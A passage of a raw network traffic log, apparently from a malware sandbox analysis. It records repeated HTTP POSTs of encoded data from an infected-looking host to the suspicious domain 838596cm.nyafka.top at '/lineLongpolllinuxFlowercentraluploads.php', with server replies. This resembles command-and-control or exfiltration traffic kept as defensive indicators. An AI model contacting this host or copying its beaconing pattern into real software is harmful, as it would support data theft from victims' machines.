                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mOpCuMXwLUvH93D3ItpnUkvMvxuMatC4Zz9w%2F5AiY0fjlj7lA2Bk61wOXhnwWmiafVSkFfULzYPYKnLRixDWfHo4Ds%2B6Vc9aH2rhr%2B35pvX2gMktGji53r7bEch5G5pl%2BLOSC4Y5"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7aa59b060f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7354&min_rtt=1691&rtt_var=11961&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=31063&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          93192.168.2.550076104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:11.245580912 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:11.598278999 CET2532OUTData Raw: 55 56 5e 5f 59 5c 56 5e 5e 5f 57 54 56 59 59 53 57 5e 58 5d 50 55 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UV^_Y\V^^_WTVYYSW^X]PUVY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ <X%#[*/47>=&=%X$].+2']*<6/_9?#_&'P-
                                                                                                          Jan 8, 2025 17:14:11.708601952 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:11.922523022 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:11.946995020 CET805INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:11 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nhmBaFOv4kDQ5oFUNsc3ruk1Dj3p5UwEVWg1B%2BflkKTgsEQlDTiIGZH1osnjBO6naCTxEva10jdBL%2B5feqsr4zNf583uWnwlCqCWatPVoLps3e%2BVVsyOmoEWGn4W0V2qktbzXxJg"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7aaada30424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7660&min_rtt=1577&rtt_var=12758&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=29058&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          94192.168.2.550077104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:12.078146935 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:12.426353931 CET2532OUTData Raw: 50 57 5b 54 59 50 56 5b 5e 5f 57 54 56 5f 59 53 57 5f 58 58 50 5f 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PW[TYPV[^_WTV_YSW_XXP_V[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ Z<^$#1=-![/(*>[*"0;2(1;X=?35'\./#_&'P-#
                                                                                                          Jan 8, 2025 17:14:12.523612976 CET25INHTTP/1.1 100 Continue


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          95192.168.2.550078104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:12.715471029 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1852
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:13.067307949 CET1852OUTData Raw: 50 50 5e 54 59 5e 53 58 5e 5f 57 54 56 5c 59 5d 57 52 58 53 50 54 56 58 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PP^TY^SX^_WTV\Y]WRXSPTVX[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ <8'0")%[;$3Y>X!_(+=X&;2P<"?>'5;]:#_&'P-/
                                                                                                          Jan 8, 2025 17:14:13.179564953 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:13.346962929 CET959INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:13 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DbC%2F671Ub3GuE6iTarHhLzryTup8gGMpfSAa5%2Fw8VXyg1ht7MVJ03xu6SflNeG%2BfeHxIT%2ByydVepqeKsG%2BZX7TOQHjqM%2BnxFqAXI0RIT2G5snZiJGgD12BWe2QfOXgnWO0Y0msDt"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7ab41e740f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3511&min_rtt=1578&rtt_var=4459&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2201&delivery_rate=85645&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 24 1f 24 04 34 1d 20 05 26 09 2b 5c 3f 10 2a 0d 25 01 39 07 37 01 31 27 23 06 31 05 30 5b 23 2c 21 5e 3c 5e 36 02 27 0f 30 1d 3f 2b 20 5c 04 1f 24 5f 3e 28 21 52 2a 3f 32 58 26 30 21 10 25 23 2b 00 25 13 2b 59 27 29 29 0f 34 00 23 56 2f 30 3d 0a 2d 2b 30 5d 2a 27 2c 11 27 3e 2f 50 0f 10 38 17 2e 00 23 10 36 0f 25 0f 20 33 37 1e 37 1b 33 03 3e 13 33 18 36 2c 21 5c 27 55 22 08 20 1c 3b 1c 24 1d 37 5f 3f 0f 2b 0f 3f 33 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98$$4 &+\?*%971'#10[#,!^<^6'0?+ \$_>(!R*?2X&0!%#+%+Y'))4#V/0=-+0]*','>/P8.#6% 3773>36,!\'U" ;$7_?+?3$U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          96192.168.2.550079104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:13.002216101 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:13.348176956 CET2532OUTData Raw: 55 5d 5b 52 5c 5a 56 5c 5e 5f 57 54 56 58 59 5e 57 51 58 52 50 5d 56 51 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U][R\ZV\^_WTVXY^WQXRP]VQ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#(+/_$#2=%Z.4/)=:=;!$]"R)"/>+ =<,/#_&'P-?
                                                                                                          Jan 8, 2025 17:14:13.455404043 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:13.629724026 CET806INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:13 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZRoyKuG%2FQ1mA%2FmvT6XAvJrgrGRquurj2QrENmmUKiegImrWZW5V3LvFkLKL2QeSQHjo3u%2FbxYqvswbealfSa05T7ZryUE3dMh4K%2FwS6fxEISSfX1u9nWXvGFFv6t2Ib3b56RWSw8"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7ab5cecf729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4354&min_rtt=2008&rtt_var=5446&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=70249&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          97192.168.2.550080104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:13.757082939 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:14:14.113745928 CET2532OUTData Raw: 50 56 5e 54 59 5c 56 59 5e 5f 57 54 56 5d 59 5e 57 51 58 5e 50 59 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PV^TY\VY^_WTV]Y^WQX^PYV[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ (^3$2^=![.4?.%^==':W+>?"=/^.#_&'P-+
                                                                                                          Jan 8, 2025 17:14:14.224468946 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:14.458785057 CET807INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:14 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tthJic9xVu5tsJaaJj6H7hvRfUpHcw2Zo7a7rkPCrRXBY1ZZENm3RdP%2FCpB8AtrlIFJ8u%2F2SSEW10fp0pTPUmxtv7jscnV4c2%2B8%2FmNRHQOXOhMro1ghjEWwo2ZQMQkwV6qJoATFa"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7aba9fb1424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9644&min_rtt=1594&rtt_var=16697&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=22123&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          98192.168.2.550081104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:14.590317965 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2528
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:14.942109108 CET2528OUTData Raw: 55 55 5e 57 59 5c 56 5a 5e 5f 57 54 56 5e 59 58 57 55 58 5d 50 5c 56 5f 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UU^WY\VZ^_WTV^YXWUX]P\V_[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#+('U2[=-*/$[=1](+1$;<<=(5-<-/#_&'P-/
                                                                                                          Jan 8, 2025 17:14:15.042577982 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:15.278409004 CET805INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:15 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gb6zJWGoSNm%2Fg7ohM5iETJD1WpaDluRORpe2O2XGDSIoj3IDJJc9emMgMkZzni9xrNxEXKV3JLsluZ4VY5K%2F1Q4B5LXumH8nKEsCaDHBd%2BTlr1PkbDEROUbO2kP17LKjXiZUn2nU"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7abfbe53424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2788&min_rtt=1582&rtt_var=3005&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2877&delivery_rate=130008&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          99192.168.2.550082104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:15.427294970 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:15.785809994 CET2532OUTData Raw: 55 51 5e 50 5c 5f 56 5b 5e 5f 57 54 56 57 59 59 57 55 58 53 50 5a 56 5c 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UQ^P\_V[^_WTVWYYWUXSPZV\[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ +(']'*)=5Z;#X=X:>2$2)2,>8";,/#_&'P-
                                                                                                          Jan 8, 2025 17:14:15.899221897 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:16.061072111 CET806INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:16 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bm9h7TGpHCj6bUvLNv1sMb5q831jtOJyMvg%2F5YW31OrjncZJBjSk1Rjw5Btb2jh4cl6TDttXy12ax6%2FIxlnKxUIqCiuLrkLnuPkwIAptUVOoIry0tXvy2I8vlzRC1M1AO%2FsIj3d9"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7ac50d41727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3971&min_rtt=1928&rtt_var=4810&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=79873&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          100192.168.2.550083104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:16.197083950 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:16.551284075 CET2532OUTData Raw: 50 57 5b 57 59 51 56 5b 5e 5f 57 54 56 59 59 5c 57 56 58 5b 50 5c 56 5c 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PW[WYQV[^_WTVYY\WVX[P\V\[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ *8/'0&^?.),B#*.>(+6&+?=,$![7^-?#_&'P-
                                                                                                          Jan 8, 2025 17:14:16.640945911 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:16.880630016 CET823INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:16 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DOrkYDtVaqPIauh8cL0RZOasSaEblMw%2BrbQn%2FXHul%2FApXq%2FXwPJ1EQ56CwAB5QmIZWSdeKvpq0xVnNQuHBM%2BUFoXcp7guu%2B%2FwO%2F%2BfGD3%2FbX6OUwfK7Ev5T%2FkXuNaoVqM482rfD%2Bt"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7ac9bea8424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1890&min_rtt=1590&rtt_var=1196&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=365914&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          101192.168.2.550084104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:17.047188997 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:17.395009995 CET2532OUTData Raw: 55 5c 5b 53 59 5a 56 58 5e 5f 57 54 56 5b 59 59 57 5f 58 52 50 58 56 51 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U\[SYZVX^_WTV[YYW_XRPXVQ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ _++7Y00.X=[%8?]*>;5$]>P)"8=/]5=8-#_&'P-3
                                                                                                          Jan 8, 2025 17:14:17.516134024 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:17.688308001 CET801INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:17 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bv%2FFKfoVgbo2RDuQySE%2B9LAGbc1fQTPs63tUyUqb5e7vkBnLKZ2OfqOtRIIivvI%2FqarIjmrMav3svA7zYxhXiypQJTktrt93IaS8jAMkX95GXLKu%2B8wkQiMuq0x0fmqMCnHp2Y9G"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7acf28370f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4803&min_rtt=1688&rtt_var=6863&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=54870&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a
                                                                                                          Data Ascii: 41U][
                                                                                                          Jan 8, 2025 17:14:17.778137922 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          102192.168.2.550085104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:17.909302950 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
